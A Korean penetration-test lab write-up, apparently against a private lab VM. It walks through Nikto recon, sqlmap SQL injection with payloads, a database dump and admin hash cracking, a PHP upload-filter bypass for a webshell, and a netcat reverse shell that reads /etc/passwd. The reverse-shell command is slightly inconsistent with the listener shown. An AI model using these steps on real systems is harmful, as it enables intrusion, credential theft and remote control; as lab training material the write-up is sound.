• 모의해킹 환경
    • 공격자 : OS [ Kali Linux ]
    • 피해자 : IP [ 192.168.75.132 ]
  • 1. 정보수집
    root@kali:~# nikto -host 192.168.75.132
    - Nikto v2.1.6
    ---------------------------------------------------------------------------
    + Target IP:          192.168.75.132
    + Target Hostname:    192.168.75.132
    + Target Port:        80
    + Start Time:         2018-09-09 09:25:36 (GMT9)
    ---------------------------------------------------------------------------
    + Server: Apache/2.2.16 (Debian)
    + Retrieved x-powered-by header: PHP/5.3.3-7+squeeze14
    
    
    + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
    보안 관련 헤더가 설정되어 있지 않다.
    + OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://127.0.0.1/images/".
    + Apache/2.2.16 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
    아파치 등의 버전이 오래되었다.
    + Uncommon header 'tcn' found, with contents: list + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + Cookie PHPSESSID created without the httponly flag + OSVDB-5034: /admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify. + OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
    + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3268: /images/: Directory indexing found. + OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
    /icon/, /images/ 경로에서 디렉터리 인덱싱이 발견되었다.
    + Server leaks inodes via ETags, header found with file /icons/README, inode: 3440, size: 5108, mtime: Tue Aug 28 19:48:10 2007 + OSVDB-3233: /icons/README: Apache default file found.
    + /admin/login.php: Admin login page/section found.
    php 로그인 페이지와 섹션이 발견되었다.
    + 8348 requests: 0 error(s) and 21 item(s) reported on remote host + End Time: 2018-09-09 09:25:56 (GMT9) (20 seconds) --------------------------------------------------------------------------- + 1 host(s) tested root@kali:~#
  • 웹 애플리케이션 매핑
    1. 버프 스위트를 실행.
    2. 웹 브라우저의 오청이 버프 스위트 프록시를 통해 전달되도록 설정
    3. 웹 애플리케이션 메뉴를 하나씩 누르면서 URL 구조 등에 대한 정보를 수집.
  • SQL 인젝션
    1. 각각의 메뉴들을 클릭해보며 url을 확인하던 중 test 메뉴 클릭시 주소의 뒷부분에 ?id=1 을 발견.
    2. 1 뒷부분에 '을 붙여서 실행.
    3. 에러를 확인 후 취약점이 있을 가능성이 높다고 판단.
    4. sqlmap으로 해당 페이지 정보를 획득 시도
    5. root@kali:~# sqlmap -u "http://192.168.75.132/cat.php?id=1"
    6. ___
      __H__
      ___ ___[.]_____ ___ ___  {1.2.8#stable}
      |_ -| . [,]     | .'| . |
      |___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org
      
      [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
      
      [*] starting at 09:49:31
      
      [09:49:32] [INFO] testing connection to the target URL
      [09:49:32] [INFO] heuristics detected web page charset 'ascii'
      [09:49:32] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
      [09:49:32] [INFO] testing if the target URL content is stable
      [09:49:33] [INFO] target URL content is stable
      [09:49:33] [INFO] testing if GET parameter 'id' is dynamic
      [09:49:33] [INFO] confirming that GET parameter 'id' is dynamic
      [09:49:33] [INFO] GET parameter 'id' is dynamic
      [09:49:33] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
      [09:49:33] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
      [09:49:33] [INFO] testing for SQL injection on GET parameter 'id'
      it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
      for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
      [09:50:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
      [09:50:59] [WARNING] reflective value(s) found and filtering out
      [09:50:59] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Ruby")
      [09:50:59] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
      [09:50:59] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
      [09:50:59] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
      [09:50:59] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
      [09:50:59] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
      [09:50:59] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
      [09:50:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
      [09:50:59] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
      [09:50:59] [INFO] testing 'MySQL inline queries'
      [09:50:59] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
      [09:50:59] [WARNING] time-based comparison requires larger statistical model, please wait.............  (done)                            
      [09:50:59] [INFO] testing 'MySQL > 5.0.11 stacked queries'
      [09:50:59] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
      [09:50:59] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
      [09:50:59] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
      [09:50:59] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
      [09:50:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
      [09:51:19] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable 
      [09:51:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
      [09:51:20] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
      [09:51:20] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
      [09:51:20] [INFO] target URL appears to have 4 columns in query
      [09:51:20] [INFO] target URL appears to be UNION injectable with 4 columns
      [09:51:20] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
      [09:51:20] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
      GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
      sqlmap identified the following injection point(s) with a total of 68 HTTP(s) requests:
      ---
      Parameter: id (GET)
      Type: boolean-based blind
      Title: AND boolean-based blind - WHERE or HAVING clause
      Payload: id=1 AND 8628=8628
      
      Type: error-based
      Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
      Payload: id=1 AND (SELECT 3376 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(3376=3376,1))),0x7178627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
      
      Type: AND/OR time-based blind
      Title: MySQL >= 5.0.12 AND time-based blind
      Payload: id=1 AND SLEEP(5)
      
      Type: UNION query
      Title: Generic UNION query (NULL) - 4 columns
      Payload: id=1 UNION ALL SELECT NULL,CONCAT(0x717a6a7671,0x4156577642507159497973426d46456a6877524d764a4c52684d75656745736d69775a7a50467772,0x7178627171),NULL,NULL-- qnSc
      ---
      [09:51:23] [INFO] the back-end DBMS is MySQL
      web server operating system: Linux Debian 6.0 (squeeze)
      web application technology: PHP 5.3.3, Apache 2.2.16
      back-end DBMS: MySQL >= 5.0
      [09:51:23] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.75.132'
      
      [*] shutting down at 09:51:23 
      									
    7. 현재 데이터베이스의 이름을 알아냅니다.
    8. root@kali:~# sqlmap -u "http://192.168.75.132/cat.php?id=1" --current-db
      생략...
      [09:57:03] [INFO] fetching current database
      current database:    'photoblog'
      [09:57:03] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.75.132'
      
      [*] shutting down at 09:57:03
      									
    9. DB의 내용을 덤프시도.
    10. root@kali:~# sqlmap -u "http://192.168.75.132/cat.php?id=1" -D photoblog --dump
      생략…
      [10:01:31] [INFO] fetching tables for database: 'photoblog'
      [10:01:31] [INFO] fetching columns for table 'pictures' in database 'photoblog'
      [10:01:31] [INFO] fetching entries for table 'pictures' in database 'photoblog'
      Database: photoblog
      Table: pictures
      [3 entries]
      +----+-------------+-----+---------+
      | id | img         | cat | title   |
      +----+-------------+-----+---------+
      | 1  | hacker.png  | 2   | Hacker  |
      | 2  | ruby.jpg    | 1   | Ruby    |
      | 3  | cthulhu.png | 1   | Cthulhu |
      +----+-------------+-----+---------+
      
      [10:01:31] [INFO] table 'photoblog.pictures' dumped to CSV file '/root/.sqlmap/output/192.168.75.132/dump/photoblog/pictures.csv'
      [10:01:31] [INFO] fetching columns for table 'users' in database 'photoblog'
      [10:01:31] [INFO] fetching entries for table 'users' in database 'photoblog'
      [10:01:31] [INFO] recognized possible password hashes in column 'password'
      do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] 
      do you want to crack them via a dictionary-based attack? [Y/n/q] 
      [10:01:45] [INFO] using hash method 'md5_generic_passwd'
      what dictionary do you want to use?
      [1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
      [2] custom dictionary file
      [3] file with list of dictionary files
      > 
      [10:01:46] [INFO] using default dictionary
      do you want to use common password suffixes? (slow!) [y/N] 
      [10:01:47] [INFO] starting dictionary-based cracking (md5_generic_passwd)
      [10:01:47] [WARNING] multiprocessing hash cracking is currently not supported on this platform
      [10:02:09] [INFO] cracked password 'P4ssw0rd' for user 'admin'                                                                            
      Database: photoblog                                                                                                                       
      Table: users
      [1 entry]
      +----+-------+---------------------------------------------+
      | id | login | password                                    |
      +----+-------+---------------------------------------------+
      | 1  | admin | 8efe310f9ab3efeae8d410a8e0166eb2 (P4ssw0rd) |
      +----+-------+---------------------------------------------+
      생략…																																												
    11. 획득한 관리자 계정 정보로 관리자 페이지에 로그인
    12. 업로드가 가능한 New picture 페이지를 대상으로 파일 업로드 공격 시도
      1. title에 파일 이름 입력, Browse버튼을 눌러 webshell.php 파일 선택
      2. php파일 업로드 차단으로 의심되며 1차 시도시 NO PHP!! 메시지와 함께 에러가 발생
      3. mv webshell.php webshell.PHP 로 확장자를 대문자로 변경해서 다시 시도시 성공
      4. Home 메뉴로 돌아가 소스코드 보기를 이용하여 업로드된 파일의 경로를 검색.
  • 리버스 쉘 침투
    1. 터미널에서 nc 명령문으로 4000번 포트를 리스닝 모드로 생성

      nc- lvnp 4000

    2. 웹쉘의 폼에 다음 nc 명령문을 입력하여 리스닝 중인 포트에 접속

      nc 192.168.75.132 -e /bin/sh

    3. 터미널에서 접속이 이루어진 것을 확인후 쉘득 획득하고 침투에 성공

    root@kali:~# nc -lvnp 4000
    listening on [any] 4000 ...
    connect to [192.168.75.130] from (UNKNOWN) [192.168.75.132] 53003
    id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    uname -a
    Linux debian 2.6.32-5-686 #1 SMP Sun May 6 04:01:19 UTC 2012 i686 GNU/Linux
    cat /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
    libuuid:x:100:101::/var/lib/libuuid:/bin/sh
    mysql:x:101:103:MySQL Server,,,:/var/lib/mysql:/bin/false
    sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
    user:x:1000:1000:Debian Live user,,,:/home/user:/bin/bash